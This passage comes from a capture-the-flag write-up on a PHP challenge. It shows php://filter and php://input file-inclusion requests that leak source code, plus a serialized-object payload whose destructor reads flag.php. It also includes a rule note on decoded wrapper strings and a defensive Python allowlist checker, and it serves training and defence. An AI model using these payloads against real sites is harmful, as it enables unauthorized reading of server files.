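Matching on the decoded parameter value rather than the raw request line matters: `php%3A%2F%2Finput` is the same wrapper once the server decodes it, and a rule that only greps for `php://` misses it.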

3. Solving the challenge

First, an attempt to read the flag directly:

?file=php://filter/read=convert.base64-encode/resource=flag.php&pw=php://input

This fails, presumably because of a filter, so read another file instead:

?file=php://filter/read=convert.base64-encode/resource=heicore.php&pw=php://input

which yields:

```php
<?php

class Heicore{
    public $file;

    public function __destruct(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
    }
}
?>
```

This points to deserialization.

Keep reading:

?file=php://filter/read=convert.base64-encode/resource=relax.php&pw=php://input

which yields:

```php
<?php
error_reporting(E_ALL^E_NOTICE^E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];

if(isset($_)&&(file_get_contents($_,'r')==="Two thousand three hundred and thirty-three")){
    echo '<img src="./images/13.jpg" alt=""><br>';
    if(preg_match("/flag/i",$__)){
        echo "It's not that simple";
        exit();
    }else{
        include($__);
        unserialize($___);
    }
}else{
    echo '<img src="./images/1.gif" alt="">';
}

?>
```

The include target is rejected if it matches /flag/i, but the value handed to unserialize() is not checked at all, so include heicore.php to load the class and let the Heicore destructor read flag.php. The payload:

/relax.php?pw=php://input&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:8:"flag.php";}

POST body:

Two thousand three hundred and thirty-three

This returns the flag.
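The `(><)` value above is a PHP serialize() string: `O:7:"Heicore":1:{...}` declares an object of the 7-byte class name Heicore with one property, and `s:8:"flag.php"` an 8-byte string, each length prefix being authoritative. The parser below is an added example (my code, not the post's or the challenge's) that reads this format, lists every class a payload would instantiate, and rejects anything outside an allowlist, which is the policy PHP 7+ enforces natively with `unserialize($x, ['allowed_classes' => [...]])`; relax.php calling unserialize() on raw input with no such restriction is what makes the destructor reachable. HEICORE_PAYLOAD is the payload from this writeup; the function and class names are mine.

```python
import re

# Matches the integer or float that follows a type tag: i:-5;  d:1.5;  s:8:
_NUMBER_RE = re.compile(rb"-?[0-9]+(?:\.[0-9]+)?(?:[eE][-+]?[0-9]+)?")


class PhpUnserializeError(ValueError):
    """Raised on malformed input; a real unserialize() would return false here."""


class PhpObject:
    """Stand-in for an object the payload would instantiate: class name plus properties."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props

    def __repr__(self):
        return f"PhpObject({self.cls!r}, {self.props!r})"


class _Parser:
    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def _take(self, literal: bytes):
        if not self.data.startswith(literal, self.pos):
            raise PhpUnserializeError(f"expected {literal!r} at offset {self.pos}")
        self.pos += len(literal)

    def _number(self) -> bytes:
        m = _NUMBER_RE.match(self.data, self.pos)
        if not m:
            raise PhpUnserializeError(f"expected a number at offset {self.pos}")
        self.pos = m.end()
        return m.group(0)

    def _counted_string(self) -> bytes:
        # :<len>:"<bytes>"  The declared byte length wins over the quotes, which is
        # why the payload has to spell out s:8:"flag.php" rather than just quote it.
        self._take(b":")
        length = int(self._number())
        self._take(b':"')
        s = self.data[self.pos:self.pos + length]
        if len(s) != length:
            raise PhpUnserializeError("declared string length runs past the end of input")
        self.pos += length
        self._take(b'"')
        return s

    def _members(self) -> dict:
        # :<count>:{ <key><value> ... }   shared by arrays (a:) and objects (O:)
        self._take(b":")
        count = int(self._number())
        self._take(b":{")
        members = {}
        for _ in range(count):
            key = self.value()
            members[key] = self.value()
        self._take(b"}")
        return members

    def value(self):
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":
            self._take(b";")
            return None
        if tag in (b"b", b"i", b"d"):
            self._take(b":")
            raw = self._number()
            self._take(b";")
            if tag == b"b":
                return raw == b"1"
            return int(raw) if tag == b"i" else float(raw)
        if tag == b"s":
            s = self._counted_string()
            self._take(b";")
            return s.decode("utf-8", "surrogateescape")
        if tag == b"a":
            return self._members()
        if tag == b"O":
            cls = self._counted_string().decode("utf-8", "surrogateescape")
            return PhpObject(cls, self._members())
        raise PhpUnserializeError(f"unknown type tag {tag!r} at offset {self.pos - 1}")


def php_unserialize(data: bytes):
    """Parse a complete serialize() string; trailing bytes are an error."""
    parser = _Parser(data)
    value = parser.value()
    if parser.pos != len(data):
        raise PhpUnserializeError(f"trailing bytes at offset {parser.pos}")
    return value


def classes_in(value) -> set:
    """Every class name the payload would instantiate, including nested ones."""
    found = set()
    if isinstance(value, PhpObject):
        found.add(value.cls)
        value = value.props
    if isinstance(value, dict):
        for v in value.values():
            found |= classes_in(v)
    return found


def is_allowed_payload(data: bytes, allowed_classes=()) -> bool:
    """True only if the payload parses and names no class outside the allowlist."""
    try:
        value = php_unserialize(data)
    except (ValueError, TypeError):  # PhpUnserializeError is a ValueError
        return False
    return classes_in(value) <= set(allowed_classes)


# The writeup's payload for the (><) parameter
HEICORE_PAYLOAD = b'O:7:"Heicore":1:{s:4:"file";s:8:"flag.php";}'
```

With an empty allowlist the Heicore payload is rejected outright, which is the behaviour a page like relax.php should have had; allowing only the classes the application genuinely expects to round-trip, or switching to a data-only format such as JSON, removes the destructor path entirely.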

Reference blogs

https://www.cnblogs.com/-mo-/p/11736445.html

https://www.cnblogs.com/fpcing/p/11390179.html

https://www.sohu.com/a/251919841_99907709


Original: https://www.cnblogs.com/LLeaves/p/12864096.html
